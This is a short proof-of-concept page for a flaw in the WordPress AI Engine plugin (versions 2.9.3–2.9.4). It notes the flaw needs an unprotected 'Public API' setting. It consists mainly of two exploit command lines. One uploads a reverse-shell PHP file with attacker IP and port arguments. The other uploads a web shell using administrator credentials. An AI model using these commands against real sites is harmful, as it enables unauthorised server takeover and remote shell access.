
Wordpress Plugin AI Engine 2.9.3 - 2.9.4 Proof Of Concept
Wordpress Plugin AI Engine 2.9.3 - 2.9.4 Proof Of Concept
Please note that this vulnerability can only be exploited if the “Public API” option is enabled, which is disabled by default, and no Bearer Token is configured, nor is custom authentication added and used to protect the API.
python3 exploit-auto.py --url "http://target.com" --username "Admin" --password "L87*********C4u" --file reverse.php --attacker-ip 127.0.0.1 --attacker-port 4444
python3 exploit.py \
--url "http://target.com/" \
--username "Admin" \
--password "L87*********C4u" \
--file shell.php